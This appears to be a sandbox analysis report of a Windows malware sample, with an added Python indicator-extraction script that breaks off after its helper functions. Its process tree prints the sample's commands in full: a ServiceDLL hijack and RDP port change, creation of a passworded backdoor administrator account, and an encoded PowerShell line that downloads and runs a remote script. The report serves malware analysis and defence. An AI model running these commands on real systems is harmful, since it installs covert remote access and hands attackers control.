Analysis
-
max time kernel
69s -
max time network
74s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
24-09-2021 18:54
Static task
static1
Behavioral task
behavioral1
Sample
5367615a3d3f95eeab592a53716ed3bb.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
5367615a3d3f95eeab592a53716ed3bb.exe
Resource
win10v20210408
General
-
Target
5367615a3d3f95eeab592a53716ed3bb.exe
-
Size
5.7MB
-
MD5
5367615a3d3f95eeab592a53716ed3bb
-
SHA1
8592c6e78aa592d9f135dbe9d97cf2f524dbeaed
-
SHA256
af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0
-
SHA512
383fada6525e8ced7cc40c14d6cb6718583da6dca4f7db2654c15c0842a692d2011364da6f53690f005ed33f90606e81836eefeb8df04de655904fa5776b8790
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exe (PID 1632), network flows 7, 9, 10, 11, 13, 15, 17, 19 and 21
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
YARA rule matches on dropped resources:
\Windows\Branding\mediasrv.png matches rule upx
\Windows\Branding\mediasvc.png matches rule upx
Loads dropped DLL 2 IoCs
Processes:
PID 3348 (image name not captured in the report)
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
Drops file in Windows directory 19 IoCs
Processes:
powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zheoogak.tjh.psm1
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7BA.tmp
powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
powershell.exe: File opened for modification C:\Windows\branding\wupsvc.jpg
powershell.exe: File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BC.tmp
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI76A.tmp
powershell.exe: File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_c3uacqs4.oep.ps1
powershell.exe: File created C:\Windows\branding\mediasvc.png
powershell.exe: File created C:\Windows\branding\wupsvc.jpg
powershell.exe: File opened for modification C:\Windows\branding\mediasrv.png
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI72B.tmp
powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
powershell.exe: File created C:\Windows\branding\mediasrv.png
powershell.exe: File opened for modification C:\Windows\branding\ShellBrd
powershell.exe: File opened for modification C:\Windows\branding\mediasvc.png
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7AA.tmp
powershell.exe: File opened for modification C:\Windows\branding\Basebrd
Modifies data under HKEY_USERS 64 IoCs
Processes: all 64 entries were written by powershell.exe under \REGISTRY\USER\S-1-5-20, the profile hive of NT AUTHORITY\NETWORK SERVICE, which (together with the temp files dropped under ServiceProfiles\NetworkService) indicates that this PowerShell instance ran as that account. Paths below are relative to that hive; "(unnamed value)" marks a write to a key's default value.
Key created: Software\Policies\Microsoft\SystemCertificates\Disallowed
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ (unnamed value)
Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ (unnamed value)
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"
Key created: Software\Policies\Microsoft\SystemCertificates\trust\CRLs
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"
Key created: Software\Policies\Microsoft\SystemCertificates\TrustedPeople
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"
Key created: Software\Microsoft\SystemCertificates\Root\Certificates
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ (unnamed value)
Key created: Software\Policies\Microsoft\SystemCertificates\trust
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"
Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
Key created: Software\Microsoft\SystemCertificates\trust\CTLs
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ (unnamed value)
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"
Key created: Software\Microsoft\Windows
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"
Key created: Software\Microsoft\SystemCertificates\trust\Certificates
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ (unnamed value)
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"
Key created: Software\Microsoft\SystemCertificates\trust
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
Key created: Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0
Key created: Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
Key created: Software
Set value (str): Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"
Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"
Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"
Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges
Set value (str): Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"
Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
HTTP User-Agent header, flow 10: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header, flow 11: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header, flow 13: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header, flow 9: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exe PID 1092 (3 events)
powershell.exe PID 3604 (3 events)
powershell.exe PID 3976 (3 events)
powershell.exe PID 2808 (3 events)
powershell.exe PID 1092 (3 further events)
powershell.exe PID 1632 (3 events)
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
PID 604 (image name not captured in the report)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe PID 1092: SeDebugPrivilege
powershell.exe PID 3604: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
powershell.exe PID 3976: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
powershell.exe PID 2808: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33 (list truncated at the 64-entry cap)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Source PID and image -> target PID and image; every pair was recorded twice, 64 events in total. PIDs are reused within the run (3812, 2808, 3604, 976 and 400 each appear as two different images), so correlate on image name and parent rather than on PID alone.
628 5367615a3d3f95eeab592a53716ed3bb.exe -> 1092 powershell.exe (x2)
1092 powershell.exe -> 2056 csc.exe (x2)
2056 csc.exe -> 2452 cvtres.exe (x2)
1092 powershell.exe -> 3604 powershell.exe (x2)
1092 powershell.exe -> 3976 powershell.exe (x2)
1092 powershell.exe -> 2808 powershell.exe (x2)
1092 powershell.exe -> 2736 reg.exe (x2)
1092 powershell.exe -> 3812 reg.exe (x2)
1092 powershell.exe -> 976 reg.exe (x2)
1092 powershell.exe -> 3556 net.exe (x2)
3556 net.exe -> 3968 net1.exe (x2)
1092 powershell.exe -> 1840 cmd.exe (x2)
1840 cmd.exe -> 1424 cmd.exe (x2)
1424 cmd.exe -> 4032 net.exe (x2)
4032 net.exe -> 3984 net1.exe (x2)
1092 powershell.exe -> 3784 cmd.exe (x2)
3784 cmd.exe -> 2176 cmd.exe (x2)
2176 cmd.exe -> 2808 net.exe (x2)
2808 net.exe -> 2196 net1.exe (x2)
3812 cmd.exe -> 568 net.exe (x2)
568 net.exe -> 740 net1.exe (x2)
3668 cmd.exe -> 3500 net.exe (x2)
3500 net.exe -> 400 net1.exe (x2)
976 cmd.exe -> 3556 net.exe (x2)
3556 net.exe -> 3764 net1.exe (x2)
3604 cmd.exe -> 876 net.exe (x2)
876 net.exe -> 2676 net1.exe (x2)
3444 cmd.exe -> 2980 net.exe (x2)
2980 net.exe -> 2756 net1.exe (x2)
3480 cmd.exe -> 400 net.exe (x2)
400 net.exe -> 4052 net1.exe (x2)
4044 cmd.exe -> 3912 WMIC.exe (x2)
Processes
-
[level 1] C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"
  - Suspicious use of WriteProcessMemory
  PID: 628
-
[level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1092
-
[level 3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.cmdline"
  - Suspicious use of WriteProcessMemory
  PID: 2056
-
[level 4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA841.tmp" "c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\CSC37CB2EB3121A4206B5E6BEA37C38AEFE.TMP"
  PID: 2452
-
[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 3604
-
[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 3976
-
[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 2808
-
[level 3] C:\Windows\system32\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
  PID: 2736
-
[level 3] C:\Windows\system32\reg.exe
  Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
  - Modifies registry key
  PID: 3812
-
[level 3] C:\Windows\system32\reg.exe
  Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
  PID: 976
-
[level 3] C:\Windows\system32\net.exe
  Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  - Suspicious use of WriteProcessMemory
  PID: 3556
-
[level 4] C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  PID: 3968
-
[level 3] C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
  - Suspicious use of WriteProcessMemory
  PID: 1840
-
[level 4] C:\Windows\system32\cmd.exe
  Command line: cmd /c net start rdpdr
  - Suspicious use of WriteProcessMemory
  PID: 1424
-
[level 5] C:\Windows\system32\net.exe
  Command line: net start rdpdr
  - Suspicious use of WriteProcessMemory
  PID: 4032
-
[level 6] C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 start rdpdr
  PID: 3984
-
[level 3] C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
  - Suspicious use of WriteProcessMemory
  PID: 3784
-
[level 4] C:\Windows\system32\cmd.exe
  Command line: cmd /c net start TermService
  - Suspicious use of WriteProcessMemory
  PID: 2176
-
[level 5] C:\Windows\system32\net.exe
  Command line: net start TermService
  - Suspicious use of WriteProcessMemory
  PID: 2808
-
[level 6] C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 start TermService
  PID: 2196
-
[level 3] C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
  PID: 2840
-
[level 3] C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
  PID: 980
-
[level 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc Ghar4f5 /del
  - Suspicious use of WriteProcessMemory
  PID: 3812
-
[level 2] C:\Windows\system32\net.exe
  Command line: net.exe user wgautilacc Ghar4f5 /del
  - Suspicious use of WriteProcessMemory
  PID: 568
-
[level 3] C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
  PID: 740
-
[level 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc FWXHxFTu /add
  - Suspicious use of WriteProcessMemory
  PID: 3668
-
[level 2] C:\Windows\system32\net.exe
  Command line: net.exe user wgautilacc FWXHxFTu /add
  - Suspicious use of WriteProcessMemory
  PID: 3500
-
[level 3] C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 user wgautilacc FWXHxFTu /add
  PID: 400
-
[level 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  - Suspicious use of WriteProcessMemory
  PID: 976
-
[level 2] C:\Windows\system32\net.exe
  Command line: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  - Suspicious use of WriteProcessMemory
  PID: 3556
-
[level 3] C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  PID: 3764
-
[level 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  - Suspicious use of WriteProcessMemory
  PID: 3604
-
[level 2] C:\Windows\system32\net.exe
  Command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  - Suspicious use of WriteProcessMemory
  PID: 876
-
[level 3] C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  PID: 2676
-
[level 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  - Suspicious use of WriteProcessMemory
  PID: 3444
-
[level 2] C:\Windows\system32\net.exe
  Command line: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  - Suspicious use of WriteProcessMemory
  PID: 2980
-
[level 3] C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
  PID: 2756
-
[level 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc FWXHxFTu
  - Suspicious use of WriteProcessMemory
  PID: 3480
-
[level 2] C:\Windows\system32\net.exe
  Command line: net.exe user wgautilacc FWXHxFTu
  - Suspicious use of WriteProcessMemory
  PID: 400
-
[level 3] C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 user wgautilacc FWXHxFTu
  PID: 4052
-
[level 1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - Suspicious use of WriteProcessMemory
  PID: 4044
-
[level 2] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic path win32_VideoController get name
  PID: 3912
-
[level 1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  PID: 876
-
[level 2] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic CPU get NAME
  PID: 3604
-
[level 1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  PID: 3964
-
[level 2] C:\Windows\system32\cmd.exe
  Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  PID: 3780
-
[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - Blocklisted process makes network request
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID: 1632
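The process tree above holds the whole post-exploitation chain as plain command lines: reg.exe moves the RDP listener to a non-default port (0x1C21, decimal 7201) and points the TermService ServiceDLL at the dropped C:\Windows\branding\mediasrv.png, net.exe adds NETWORK SERVICE to Administrators, creates the local account wgautilacc and puts it in Remote Desktop Users and Administrators, and a nested cmd /C launches PowerShell with a base64 -enc payload that pulls speed.ps1 from raw.githubusercontent.com. The script below is an added example and is not part of the sandbox report or of the sample; it takes those command lines (embedded as a constructed list copied from the tree) and turns them into the indicators a responder would want: the decimal RDP port, the hijacked ServiceDLL path, the account and group changes, and the decoded -EncodedCommand with the URL it contains.

```python
"""Pull the post-exploitation indicators out of the command lines recorded
in the process tree above: the RDP port change, the TermService ServiceDLL
hijack, the local-account and group changes, and the -EncodedCommand payload.

Added example; not part of the sandbox report or of the sample. Input is a
constructed list of command lines copied from the tree on this page."""
import base64
import re

# Base64 blob exactly as passed to "-enc" in the process tree above.
ENC = ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA")

# Constructed input: one copy of each leaf command line from the tree above
# (the net1.exe children are omitted so nothing is counted twice).
CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    r'"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService',
    r'"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f',
    r'cmd /C net.exe user wgautilacc Ghar4f5 /del',
    r'cmd /C net.exe user wgautilacc FWXHxFTu /add',
    r'cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD',
    r'cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD',
    r'cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD',
    r'cmd /C net.exe user wgautilacc FWXHxFTu',
    "cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENC,
]


def tokens(cmdline):
    """Split a Windows command line on whitespace, keeping quoted spans whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(tok):
    """Lower-cased image name of a path token (last backslash-separated part)."""
    return tok.rsplit('\\', 1)[-1].lower()


def unwrap_cmd(toks):
    """Strip any number of 'cmd /c' wrappers so the innermost command is analysed."""
    while len(toks) > 2 and basename(toks[0]) in ('cmd', 'cmd.exe') and toks[1].lower() == '/c':
        toks = toks[2:]
    return toks


def decode_encoded_command(toks):
    """Plaintext of a powershell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    if not toks or basename(toks[0]) not in ('powershell', 'powershell.exe', 'pwsh', 'pwsh.exe'):
        return None
    for i, t in enumerate(toks[:-1]):
        if not t.startswith(('-', '/')):
            continue
        opt = t.lstrip('-/').lower()
        # powershell.exe accepts any unambiguous prefix (-e, -ec, -enc, ...); -ep is ExecutionPolicy.
        if opt in ('e', 'ec') or (opt.startswith('en') and 'encodedcommand'.startswith(opt)):
            try:
                return base64.b64decode(toks[i + 1]).decode('utf-16-le')
            except (ValueError, UnicodeDecodeError):
                return None
    return None


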